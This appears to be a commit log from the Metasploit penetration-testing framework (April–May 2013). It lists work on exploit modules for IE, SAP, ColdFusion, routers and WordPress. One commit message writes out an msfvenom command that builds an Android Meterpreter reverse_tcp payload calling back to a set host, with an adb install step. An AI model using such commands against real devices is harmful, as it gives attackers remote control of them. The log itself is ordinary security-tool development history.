2504aa4550
Land #1812 , mailvelope chrome extension key grabber
2013-05-15 10:10:36 -05:00
649a8829d3
Add modules for Mutiny vulnerabilities
2013-05-15 09:02:25 -05:00
c410a54d44
Merge SAP SMB Relay abuses in just one module
2013-05-14 20:53:08 -05:00
357ef001cc
Change module filename
2013-05-14 20:52:33 -05:00
e1111928c2
Adds patch info for ie_cgenericelement_uaf
...
This one is MS13-038
2013-05-14 14:55:02 -05:00
41e9f35f3f
Landing #1819 - Convert sap_mgmt_con_osexec_payload to multi platform
2013-05-14 14:48:16 -05:00
5e925f6629
Description update
2013-05-14 14:20:27 -05:00
3d7c9a9a06
Changed the path from TARGETURI
2013-05-14 00:11:40 -03:00
42cfa72f81
Update data after test kloxo 6.1.12
2013-05-13 19:09:06 -05:00
58f2373171
Added module for EDB 25406
2013-05-13 18:08:23 -05:00
5e997aaf80
Landing #1816 - lists essential information about CouchDB
2013-05-13 16:46:20 -05:00
cba045a604
Make additional changes to the module
2013-05-13 16:42:33 -05:00
e3384439ed
64-bit, not '64 bits'
2013-05-13 15:40:17 -05:00
e71e0c1c28
Land #1822 , @wchen-r7's module for Coldfusion HTP disclosed exploit
2013-05-13 12:41:54 -05:00
f04ca17bb9
Fix default action
2013-05-13 11:56:02 -05:00
5b64379553
Add Coldfusion 9 target, OSVDB ref and review
2013-05-13 11:55:11 -05:00
60299c2adb
Add EDB-25305 - That ColdFusion 10 sub0 0day stuff
...
This is just an aux module that extract passwords from
password.properties. Yes, this can leverage a shell too, but
obviously that's best implemented in #1737 , or as a new exploit.
We'll see.
2013-05-12 21:23:53 -05:00
6db1fea6b9
create x64_reverse_https stagers
2013-05-13 01:41:56 +02:00
feac292d85
Clean up for dlink_dsl320b_password_extractor
2013-05-12 17:35:59 -05:00
ee46771de5
Land #1799 , @m-1-k-3's auth bypass module for Dlink DSL320
2013-05-12 17:34:08 -05:00
981cc891bc
description
2013-05-12 20:07:32 +02:00
ce594a3ba2
Deprecate modules/exploits/windows/http/sap_mgmt_con_osexec_payload
2013-05-12 08:46:40 -05:00
495f1e5013
Add multi platform module for SAP MC exec exploit
2013-05-12 08:46:00 -05:00
7fcf20201b
Ranking should be the same (to GoodRanking)
2013-05-11 09:19:25 -05:00
a94d078bfd
Added the statement return to condition: if res.nil?
2013-05-11 00:59:05 -03:00
18ee9af59f
Added couchdb_enum.rb to list essential information about CouchDB
2013-05-10 23:18:48 -03:00
7a7f4a1727
Added couchdb_login.rb to try to brute-force credentials of CouchDB
2013-05-10 23:16:11 -03:00
55fc1458de
Simplify and clean up some
...
I'd really love to make this work on Linux as well, since it's really
just a file grabber/parser. Unfortunately, the Post API for enumerating
users and homedirs isn't great for cross-platform stuff like this.
A few small changes, all verified on Windows 7:
* Reuse the key storing code instead of copy-paste with minor changes
* Use binary mode when opening the stored prefs
* Don't bother checking for incognito since we're using `steal_token`
anyway
* Check for existence of directories instead of guessing based on OS
match
2013-05-10 16:58:35 -05:00
84ff72eb92
use file_exist? instead of fs.file.stat
2013-05-10 11:17:42 -04:00
25f7af43b4
use gsub instead of split/join
2013-05-10 11:12:56 -04:00
d37d211ecc
Fix short escape sequences error
2013-05-09 17:29:55 -05:00
4147a27216
Land #1667 , @nmonkee's sap_soap_rfc_sxpg_command_exec exploit
2013-05-09 17:00:11 -05:00
6842432abb
Land #1678 , @nmonkee's sap_soap_rfc_sxpg_call_system_exec exploit
2013-05-09 16:52:01 -05:00
cf05602c6f
Land #1661 , @nmonkee's sap_soap_rfc_eps_get_directory_listing module
2013-05-09 16:46:13 -05:00
b18a98259b
Modify default rport
2013-05-09 16:24:54 -05:00
3e1d1a3f98
Land #1659 , @nmonkee's sap_soap_rfc_eps_delete_file module
2013-05-09 16:22:54 -05:00
53c08cd60f
fix incorrect printing typo
2013-05-09 21:37:04 +01:00
95b0d4e5ec
move filename init up to remove dup code
...
as suggested by @jlee-r7
2013-05-09 13:29:21 -04:00
2f543d3080
extension and pref parsing
2013-05-09 13:23:28 -04:00
9043eeda66
A slight change for stability
...
While updating ie_cgenericelement_uaf earlier today, I noticed the
changes made it a tiny bit less stable. Juan's test log in #1809
also kinda shows that (with the first attempt failing), so I decided
to go back and move the string crafting part, that way between
CollectGarbage() and the overwrite, there is less noise, and hopefully
more stable. I did a few tests, seems better.
2013-05-08 20:02:55 -05:00
bdd2287daf
Land #1809 , @wchen-r7's modification for ie_cgenericelement_uaf
2013-05-08 16:21:11 -05:00
0e51042a01
Landing #1808 - ERS Viewer 2011 bof (CVE-2013-0726)
2013-05-08 15:51:46 -05:00
9a1400a75b
Forgot to remove this print_warning
2013-05-08 15:44:04 -05:00
075f6e8d45
Updates ROP chain and mstime_malloc usage
2013-05-08 15:42:45 -05:00
4c75354a6a
Land #1786 , request_cgi instead of request_raw
...
Also some other small changes to modules, such as sensible defaults for
options.
2013-05-08 14:58:04 -05:00
c7609ac7d1
Initial update
2013-05-08 14:24:52 -05:00
1aa80cd35e
Add module for CVE-2013-0726
2013-05-08 13:48:48 -05:00
e939de583c
Clean up and multi platform support for sap_soap_rfc_sxpg_command_exec
2013-05-07 22:46:39 -05:00
5f59d9f723
Move sap_soap_rfc_sxpg_command_exec to multi dir
2013-05-07 22:46:04 -05:00
ab60e0bfb7
Fix print message
2013-05-07 22:41:15 -05:00
24bad9c15c
Clean up sap_soap_rfc_sxpg_call_system_exec and make it multi platform
2013-05-07 17:03:10 -05:00
76f6d9f130
Move module to multi-platform location
2013-05-07 17:01:56 -05:00
71c68d09c1
Allow user ability to set filename for psexec service binary
...
This should probably be higher up for all
generate_payload_exe but would take a major edit
2013-05-07 15:26:22 -03:00
e3582887cf
OSVDB, Base64
2013-05-07 08:28:48 +02:00
fff8593795
Fix author name
2013-05-06 17:34:37 -05:00
c84febb81a
Fix extra character
2013-05-06 15:19:15 -05:00
92b4d23c09
Add Mariano as Author because of the abuse disclosure
2013-05-06 15:15:15 -05:00
db243e78c8
Land #1682 , sap_router_info_request fix from @nmonkee
2013-05-06 15:13:57 -05:00
85581a0b6f
Clean up sap_soap_rfc_eps_get_directory_listing
2013-05-06 13:21:42 -05:00
1fc0bfa165
Change module filename
2013-05-06 13:20:07 -05:00
09bf23f4d6
linksys wrt160n tftp download module
2013-05-06 16:18:15 +02:00
22d850533a
dir615 down and exec exploit
2013-05-06 15:33:45 +02:00
0f2a3fc2d4
dsl320b authentication bypass - password extract
2013-05-06 14:31:47 +02:00
7b960a4f18
Add OSVDB reference
2013-05-06 00:54:00 -05:00
a17062405d
Clean up for sap_soap_rfc_eps_delete_file
2013-05-06 00:53:07 -05:00
5adc2879bf
Change module filename
2013-05-06 00:51:23 -05:00
66a5eb74c5
Move file to auxiliary/dos/sap
2013-05-06 00:50:50 -05:00
e40695769d
unbotch merge?
2013-05-05 16:43:56 -05:00
2d99167fe7
Merge commit 'b0f5255de8f78fb0d54be1ee49f43455968d6740' into upstream-master
2013-05-05 16:41:18 -05:00
b0f5255de8
fix ssh_creds username
...
ssh_creds post module as not saving
the username in the cred objects
2013-05-05 16:31:28 -05:00
8239998ada
Typo on URL for #1797 . Thx @Meatballs1
2013-05-05 12:26:06 -05:00
c9ea7e250e
Fix disclosure date, ref for #1897
2013-05-05 12:13:02 -05:00
e9841b216c
Land #1797 , IE8 DoL exploit module from @wchen-r7
...
Exploit for an in-the-wild unpatched vuln in IE8. @jvazquez-r7 already
reviewed functionality
2013-05-05 12:06:45 -05:00
a33510e821
Add MS IE8 DoL 0day exploit (CVE-2013-1347)
...
This module exploits a use-after-free vuln in IE 8, used in the
Department of Labor attack.
2013-05-05 12:04:17 -05:00
63b0eace32
Add a missing require
2013-05-04 22:39:57 -05:00
c3e9503c0b
tplink traversal - initial commit
2013-05-03 14:27:13 -05:00
589be270bf
Land #1658 , @nmonkee's SAP module for PFL_CHECK_OS_FILE_EXISTENCE
2013-05-03 14:19:36 -05:00
13202a3273
Add OSVDB reference
2013-05-03 09:46:29 -05:00
a95de101e7
Delete extra line
2013-05-02 22:04:27 -05:00
6210b42912
Port EDB 25141 to msf
2013-05-02 22:00:43 -05:00
a2e1fbe7a9
Make msftidy happy
2013-05-02 19:46:26 -05:00
f57b2de632
Land #1787 , @wchen-r7's mod to ie_cbutton_uaf to use the js_mstime_malloc API
2013-05-02 19:44:19 -05:00
7579b574cb
Rework parse_xml
...
We try to avoid using Nokogiri in modules due to the sometimes
uncomfortable dependencies it creates with particular compiled libxml
versions. Also, the previous parse_xml doesn't seem to be correctly
skipping item entries with blank names.
I will paste the test XML in the PR proper, but do check against a live
target to make sure I'm not screwing it up.
2013-05-02 14:43:30 -05:00
902cd7ec85
Revert removal of the SAP module
...
This reverts commit 26da7a6ee7
2013-05-02 14:42:35 -05:00
eb23b5feeb
Forgot to remove function ie8_smil. Don't need this anymore.
2013-05-02 14:04:15 -05:00
329e8228d1
Uses js_mstime_malloc to do the no-spray technique
2013-05-02 14:00:15 -05:00
26da7a6ee7
Removing this from master due to test problems
...
This module was moved over to the unstable branch in commit
7106afdf7d
2013-05-02 13:43:02 -05:00
132c09af82
Add BID reference
2013-05-02 10:21:09 -05:00
6e68f3cf34
Clean up sap_soap_rfc_pfl_check_os_file_existence
2013-05-02 10:19:15 -05:00
244bf71d4a
Change module filename
2013-05-02 10:15:50 -05:00
d9cdb6a138
Fix more feedback provided by @nmonkee: CMD vs COMMAND
2013-05-02 09:08:48 -05:00
c6c7998e3b
Fix feedback provided by @nmonkee
2013-05-02 09:06:51 -05:00
4db81923bf
Update description
2013-05-02 08:45:01 -05:00
4054d91955
Land #1657 , @nmonkee's RZL_READ_DIR_LOCAL SAP dir listing module
2013-05-02 08:38:50 -05:00
e25057b64a
Fix indent level
2013-05-01 22:01:36 -05:00
c406271921
Cleanup sap_soap_rfc_rzl_read_dir
2013-05-01 21:51:06 -05:00
98dd96c57d
Change module filename
2013-05-01 21:50:24 -05:00
6b6b53240b
Fix SAP modules, mainly to make a better use of send_request_cgi
2013-05-01 14:06:53 -05:00
a13cf53b9f
Android Meterpreter bugfixes
...
- classes.dex gets mangled on windows; use binary mode when reading it
- UnknownHostExceptions on API Level 3 emulator because of trailing
whitespace after the hostname/IP
- Work around integer overflow at year 2038 when signing the payload
2013-05-01 18:01:37 +02:00
567d2bb14b
Land #1687 , @bmerinofe's forensic file recovery post module
2013-05-01 08:13:08 -05:00
a201391ee6
Clean recovery_files
2013-04-30 13:18:32 -05:00
76e70adcff
Added Memcached Remote Denial of Service module
...
https://code.google.com/p/memcached/issues/detail?id=192
2013-04-30 17:45:09 +03:00
60e0cfb17b
Trivial description cleanup
2013-04-29 14:11:20 -05:00
4227c23133
Add a reference for Safari module
2013-04-29 14:07:55 -05:00
431cba8f36
Update print_status labels.
2013-04-29 11:13:53 -05:00
c2a1d296a2
Rename DOWNLOAD_URI -> DOWNLOAD_PATH.
...
Conflicts:
modules/auxiliary/gather/apple_safari_webarchive_uxss.rb
2013-04-29 11:11:06 -05:00
55e0ec3187
Add support for DOWNLOAD_URI option.
...
* Fixes some comments that were no longer accurate.
Conflicts:
modules/auxiliary/gather/apple_safari_webarchive_uxss.rb
2013-04-29 11:10:19 -05:00
1d9a695d2b
Landing #1772 - Adds phpMyadmin Preg_Replace module (CVE-2013-3238)
...
[Closes #1772 ]
2013-04-28 12:17:16 -05:00
ccb630eca2
Whitespace and change default user
2013-04-27 10:39:27 +01:00
209188bc22
Add refs and use targeturi
2013-04-27 10:35:49 +01:00
3ac041386b
Add php version to check
2013-04-26 23:59:49 +01:00
e25fdebd8d
Add php version to check
2013-04-26 23:58:08 +01:00
cd842df3e2
Correct phpMyAdmin
2013-04-26 23:38:27 +01:00
6bb2af7cee
Add pma url
2013-04-26 23:37:26 +01:00
6821c360b6
Landing #1761 - Adds Wordpress Total Cache module
...
[Closes #1761 ]
2013-04-26 16:08:04 -05:00
6c76bee02f
Trying to make the description sound smoother
2013-04-26 16:02:28 -05:00
9c8b93f1b7
Make sure LPORT is a string when subbing
...
* Gets rid of conversion errors like this:
[-] Exploit failed: can't convert Fixnum into String
* also removes comments from php meterp. Works for me with the
phpmyadmin_preg_replace bug, so seems legit.
2013-04-26 15:26:31 -05:00
a0c1b6d1ce
Clear out PMA's error handler
...
* Add an error_handler function that just returns true. This prevents eventual
ENOMEM errors and segfaults like these:
[Fri Apr 26 15:01:00 2013] [error] [client 127.0.0.1] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 44659282 bytes) in /home/egypt/repo/phpmyadmin/libraries/Error.class.php on line 156
[Fri Apr 26 15:01:16 2013] [notice] child pid 7347 exit signal Segmentation fault (11)
* clean up some whitespace
2013-04-26 15:25:09 -05:00
1f2cab7aef
Tidyup and getcookies
2013-04-26 20:26:04 +01:00
0901d00da5
Remove redundant pay opts
2013-04-26 19:26:29 +01:00
a17d61897d
Change to send_rq_cgi
2013-04-26 19:19:11 +01:00
bf6b1b4fbf
Land #1773 , fixes for Safari UXSS
...
Makes the module more user-friendly, doesn't barf on malformed paths for
keystroke logger catching.
2013-04-26 13:11:55 -05:00
c27245e092
Touch descriptions for module and options
2013-04-26 13:05:16 -05:00
b4606ba60a
Remove unnecessary puts call.
2013-04-26 12:55:02 -05:00
ca6d6fbc84
msftidy for whitespace
2013-04-26 12:44:11 -05:00
16769a9260
Fixing path normalization
2013-04-26 12:40:24 -05:00
54233e9fba
Better entropy
2013-04-26 17:46:43 +01:00
c8da13cfa0
Add some entropy in request
2013-04-26 17:34:17 +01:00
2fa16f4d36
Rewrite relative script URLs to be absolute.
...
* Adds rescue clauses around URI parsing/pulling
* Actually use the URI_PATH datastore option.
2013-04-26 11:25:20 -05:00
a043d3b456
Fix auth check and cookie handling
2013-04-26 17:10:24 +01:00
025315e4e4
Move to http
2013-04-26 15:42:26 +01:00
9ad19ed2bf
Final tidyup
2013-04-26 15:41:28 +01:00
99b46202b9
Do final cleanup for sap_configservlet_exec_noauth
2013-04-26 08:45:34 -05:00
308b880d79
Land #1759 , @andrewkabai's exploit for SAP Portal Command Execution
2013-04-26 08:44:11 -05:00
c7ac647e4e
Initial attempt lfi
2013-04-26 14:32:18 +01:00
5839e7bb16
simplify code
2013-04-26 12:14:42 +02:00
4aadd9363d
improve description
2013-04-26 12:13:45 +02:00
f3f60f3e02
Fixes P/P/R for target 0 (BadBlue 2.72b)
...
Target 1, which covers 2.72b, uses an invalid P/P/R from some unknown
DLL, and appears to be broken. Because 2.72b actually uses the same
ext.dll as BadBlue EE 2.7 (and that target 0 actually also works
against 2.72b), we might as well just use the same P/P/R again.
[FixRM #7875 ]
2013-04-25 20:20:24 -05:00
bf0375f0e9
Fix @jlee-r7's feedback
2013-04-25 18:43:21 -05:00
8eea476cb8
Build the jnlp uri when resource is available
2013-04-25 18:43:21 -05:00
cc961977a2
Add bypass for click2play
2013-04-25 18:43:21 -05:00
9b5e96b66f
Fix @jlee-r7's feedback
2013-04-25 14:53:09 -05:00
52b721c334
Update description
2013-04-25 14:47:35 -05:00
84e9f80ffa
Add check for WP-Super-Cache
2013-04-25 14:43:16 -05:00
6767eee08a
Add in-line signing
...
Signing the generated APK in the module means users don't have to have
keytool or jarsigner to create a working package.
Example usage:
./msfvenom -p android/meterpreter/reverse_tcp \
LHOST=192.168.99.1 LPORT=2222 -f raw > meterp.apk
adb install ./meterp.apk
2013-04-25 13:57:54 -05:00
9dd9b2d1ba
implement cleanup functionality
...
register DELETE_FILES advanced option to take control of the cleanup
functionality of CmdStagerVBS and FileDropper, implement the necessary
changes
2013-04-25 20:02:24 +02:00
15c8d92148
Fix version checked and add reference
2013-04-25 12:48:36 -05:00
a28ef1847b
update references
2013-04-25 18:26:13 +02:00
993356c73e
Add safari webarchive uxss to framework as an aux module.
2013-04-25 11:14:16 -05:00
b67fcd3219
Add OSVDB ref to sap_configservlet_exec_noauth
2013-04-25 08:13:32 -05:00
7d317e5933
Switch from post to get on check
2013-04-25 07:51:28 -05:00
d55faa14d3
Add check function
2013-04-25 07:44:37 -05:00
676f2f5f4a
implement "check" functionality
2013-04-25 07:47:30 +02:00
3b46d5d4cd
fix typos
2013-04-25 07:22:16 +02:00
2759ef073e
correction on error handling
2013-04-25 07:19:27 +02:00
6b14ac5e71
add rank to module
2013-04-25 07:07:35 +02:00
51fd07a145
Add BID reference
2013-04-24 21:48:05 -05:00
378c2079a2
Add hdm also as author
2013-04-24 17:37:29 -05:00
b816dd569c
Update description
2013-04-24 17:34:25 -05:00
573e880a62
Use the correct post id when posting
2013-04-24 17:30:24 -05:00
ded0269ba0
Add POST ID bruteforcing capabality
2013-04-24 17:21:36 -05:00
fca4c3b8b2
Add sha1 sum check to allow execution
2013-04-24 16:10:49 -05:00
d2e29b846c
Add module for Wordpress Total Cache PHP Injection
2013-04-24 15:29:40 -05:00
f22d19a10c
remove unused code block
...
ARCH_CMD was implemented in previous version of this code.
2013-04-24 21:51:35 +02:00
0339be229a
implement dynamic timeout handling
2013-04-24 18:22:37 +02:00
6f8fc81497
improve error handling
2013-04-24 17:59:11 +02:00
2b4144f20f
Add module for US-CERT-VU 345260
2013-04-24 10:47:16 -05:00
57113bee80
fine correction
...
add license
remove one unnecessary tab to make msftidy happy
2013-04-24 15:07:32 +02:00
6485124cdf
fix module name
2013-04-24 10:54:52 +02:00
358b8934bf
clarify description
2013-04-24 10:31:40 +02:00
00e6eeca54
implement command line magick to prevent bad char usage
...
commas in the HTTP queries are not allowed but the VBS stager contains
some, therefore it was necessary to find a way to echo out commas
without directly use them.
thanks to Laszlo Toth to help me figure out this windows command line
trick.
2013-04-24 09:46:36 +02:00
783cca6c17
allow only ARCH_X86 payloads
2013-04-24 09:29:47 +02:00
cae30bec23
Clean up all the whitespace found
2013-04-23 18:27:11 -05:00
ece36c0610
Update references for the las Java exploit
2013-04-22 21:55:04 -05:00
1529dff3f3
Do final cleanup for sap_configservlet_exec_noauth
2013-04-22 21:43:41 -05:00
8c9715c2ed
Land #1751 , @andrewkabai's SAP Portal remote OS command exec
2013-04-22 21:41:53 -05:00
a09b3b8023
Lands #1169 - Adds a check
...
[Closes #1169 ]
Conflicts:
modules/auxiliary/dos/http/apache_range_dos.rb
2013-04-22 15:50:15 -05:00
882b084cba
Changes the default action
2013-04-22 15:47:38 -05:00
7e28a4ddb0
Uses "ACTIONS" keys instead of datastore options
...
It's better to use ACTIONS instead of datastore in this case. Also,
did some cleanup.
2013-04-22 15:41:47 -05:00
dfff20a3fc
Landing #1692 - Handles OSQL banners and responses
...
[Close #1692 ]
2013-04-22 13:58:44 -05:00
79eb2ff62d
add EDB ID to references
2013-04-22 18:37:28 +02:00
15b06c43aa
sap_configservlet_exec_noauth auxiliary module
...
the final module was moved from my master branch to here because of the
pull request needs
2013-04-22 17:40:27 +02:00
b4f1f3efbb
remove aux module from master branch
2013-04-22 17:34:01 +02:00
750638e4d6
note on bad characters
2013-04-22 17:24:08 +02:00
a1e52b5b27
command execution needs cmd /c
2013-04-22 10:20:45 +02:00
0115833724
SyntaxError fixes
2013-04-21 20:22:41 +00:00
d26289e05a
proper output handling in case of CMD payloads
2013-04-20 17:38:58 +02:00
d59ba37e6d
resize linemax
2013-04-20 17:37:50 +02:00
e36b58169b
implement CmbStagerVBS payload execution
2013-04-20 16:37:47 +02:00
8244c4dcac
multiple payload types, different paths to execute payloads
2013-04-20 14:20:30 +02:00
7b6a784a84
basic payload execution through OS command execution
2013-04-20 13:02:22 +02:00
223556a4e6
switch to exploit module environment
...
switch to Msf::Exploit, change the necessary declarations, start to
change the exploitation process
2013-04-20 12:30:44 +02:00
cff47771a2
initial commit
...
the original aux module will be the base of the exploit module
2013-04-20 11:32:05 +02:00
1365dfe68c
Add Oracle url
2013-04-20 01:43:14 -05:00
b99fc06b6f
description updated
2013-04-20 01:43:14 -05:00
19f2e72dbb
Added module for Java 7u17 sandboxy bypass
2013-04-20 01:43:13 -05:00
49b055e5fd
make msftidy happy
2013-04-20 00:26:04 +02:00
e4d9c45ce9
remove unnecessary rank rating
2013-04-20 00:23:55 +02:00
c7fcd6931a
Use vprint_error
2013-04-19 16:22:07 -05:00
4ef33197dc
Land #1745 - @FireFart's improvement for MediaWiki aux module
2013-04-19 16:20:33 -05:00
19a158dce9
Do final cleanup for netgear_dgn2200b_pppoe_exec
2013-04-19 15:50:23 -05:00
c1819e6ecc
Land #1700 , @m-1-k-3's exploit for Netgear DGN2200B
2013-04-19 15:49:30 -05:00
eaff87879e
added text
2013-04-19 22:03:05 +02:00
a6be72b019
fixes for mediawiki aux module
2013-04-19 21:43:12 +02:00
763d1ac2f1
remove unnecessary option declaration
2013-04-19 21:42:28 +02:00
85932a2445
improve URI path and parameter handling
...
switch from PATH to TARGETURI datastore;
use normalize_uri to build uri;
use query in send_request_cgi to to prepare query string (instead of
vars_get that escapes the necessary semicolons)
2013-04-19 21:37:39 +02:00
c52588f579
remove Scanner mixin
...
remove Scanner mixin because this module is not a scanner modul
2013-04-19 20:28:44 +02:00
7fdf84ac45
Landing #1744 - Checks nil before using resp.headers['Server']
...
[Closes #1744 ]
2013-04-19 10:37:05 -05:00
31586770a0
Added module for OSVDB 92490
2013-04-18 14:34:02 -05:00
8f76c436d6
SAP ConfigServlet OS Command Execution module
...
This module allows execution of operating system commands throug the
SAP ConfigServlet without any authentication.
2013-04-18 20:26:48 +02:00
15c6df1482
Check for nil before calling on value
2013-04-18 00:32:37 -04:00
2713991c64
timeout and HTTP_Delay
2013-04-17 20:25:59 +02:00
59045f97fb
more testing, reworking of config restore, rework of execution
2013-04-17 18:10:27 +02:00
4e8d32a89a
cleanup for freefloatftp_user
2013-04-16 20:43:38 -05:00
eedeb37047
Landing #1731 , @dougsko's freefloat ftp server bof exploit
2013-04-16 20:42:01 -05:00
830715dc07
Applying changes
2013-04-16 00:28:39 +02:00
a36c6d2434
Lands #1730 , adds a VERBOSE option checker
...
Also removes VERBOSE options from extant modules. There were only 5 of
them, and one was a commented option.
2013-04-15 15:32:56 -05:00
29101bad41
Removing VERBOSE offenders
2013-04-15 15:29:56 -05:00
be39079830
Trailing whitespace fix
...
Note that this commit needed a --no-verify because of the erroneous
check in msftidy for writing to stdout. The particular syntax of this
payload makes it look like we're doing that when we're really not.
So don't sweat it.
2013-04-15 13:58:06 -05:00
efdf4e3983
Lands #1485 , fixes for Windows-based Ruby targets
2013-04-15 13:56:41 -05:00
873bdbab57
Removing APSB13-03, not ready.
...
This was landed by @todb-r7 on #1709 but that was premature. #1717 was
a proposed set of fixes, but it didn't go far enough.
@jhart-r7 and @jvazquez-r7 should revisit this module for sure, there's
some good stuff in there, but it's not ready for a real release quite
yet. Take a look at the issues discussed in those PRs and open a new PR
with a new module?
Sorry for the switcheroo, not trying to be a jerk.
[Closes #1717 ]
2013-04-15 13:36:47 -05:00
513b3b1455
Minor cleanup on DLink module
2013-04-15 13:27:47 -05:00
df9c5f4a80
remove unused resources and fix whitespace
2013-04-13 16:22:52 +01:00
32bd812bdb
android meterpreter
2013-04-12 18:57:04 +01:00
7e5d4bc893
Landing #1614 , @jwpari nagios nrpe exploit
2013-04-11 17:53:52 +02:00
e3eef76372
Land #1223
...
This adds rc4-encrypting stagers for Windows.
[Closes #1223 ]
2013-04-10 12:14:52 -05:00
6c980981db
Break up long lines and add magic encoding comment
2013-04-10 09:28:45 -05:00
a1605184ed
Landing #1719 , @m-1-k-3 dlink_diagnostic_exec_noauth exploit module
2013-04-10 11:17:29 +02:00
4f2e3f0339
final cleanup for dlink_diagnostic_exec_noauth
2013-04-10 11:15:32 +02:00
8fbade4cbd
OSVDB
2013-04-10 10:45:30 +02:00
2d09aa2a91
Landing #1709 .
2013-04-09 10:55:21 -05:00
76d4538d2a
Merge branch 'master' of github.com:rapid7/metasploit-framework
2013-04-09 10:24:54 -05:00
1e258170dc
It's a filename, so not trying to match any single char
2013-04-09 10:20:52 -05:00
50cf039170
Merge branch 'cve-2013-1899-not-auth' of github.com:jhart-r7/metasploit-framework into jhart-r7-cve-2013-1899-not-auth
2013-04-09 10:19:15 -05:00
65e5ed8950
Merge #1716 , version checker fix for UAC bypass
2013-04-09 09:00:30 -05:00
ba86e14d43
Whitespace and caps fixes
2013-04-09 08:57:53 -05:00
157f25788b
final cleanup for linksys_wrt54gl_apply_exec
2013-04-09 12:39:57 +02:00
b090495ffb
Landing pr #1703 , m-1-k-3's linksys_wrt54gl_apply_exec exploit
2013-04-09 12:38:49 +02:00
b93ba58d79
EDB, BID
2013-04-09 11:56:53 +02:00
e2b8d5ed23
Fix from David Kennedy, enable Windows 8 support
2013-04-09 02:07:40 -05:00
a2d6f7bb17
Landing #1714 - Don't bomb out if there are no wireless interfaces
...
No redmine ticket reported.
2013-04-08 17:17:47 -05:00
f369584bbd
Timeout added
2013-04-08 23:32:07 +02:00
cbefc44a45
correct waiting
2013-04-08 21:40:50 +02:00
225342ce8f
final cleanup for sysax_sshd_kexchange
2013-04-08 20:28:37 +02:00
5bc454035c
Merge remote-tracking branch 'origin/pr/1710' into landing-pr1710
2013-04-08 20:20:11 +02:00
e48cea432c
added add_sub encoder for x86 payloads
2013-04-08 20:51:39 +03:00
b1152d1567
Improve Postgres CVE-2013-1899 to detect unauthorized connections
2013-04-08 09:55:23 -07:00
d24371eaff
Merge branch 'hp_imc_reportimgservlt_traversal' of github.com:jvazquez-r7/metasploit-framework into jvazquez-r7-hp_imc_reportimgservlt_traversal
2013-04-08 10:18:30 -05:00
1b5c34db1a
Merge branch 'hp_imc_ictdownloadservlet_traversal' of github.com:jvazquez-r7/metasploit-framework into jvazquez-r7-hp_imc_ictdownloadservlet_traversal
2013-04-08 10:17:19 -05:00
11253c8f3e
Merge branch 'hp_imc_faultdownloadservlet_traversal' of github.com:jvazquez-r7/metasploit-framework into jvazquez-r7-hp_imc_faultdownloadservlet_traversal
2013-04-08 10:16:52 -05:00
James Lee
jvazquez-r7
sinn3r
Roberto Soares Espreto
Tod Beardsley
agix
m-1-k-3
Rob Fuller
nmonkee
David Maloney
HD Moore
Michael Schierl
Gregory Man
Joe Vennix
Meatballs
Andras Kabai
Antoine
Christian Mehlmauer
RageLtMan
root
Tod Beardsley
timwr
sinn3r
Melih SARICA
Jon Hart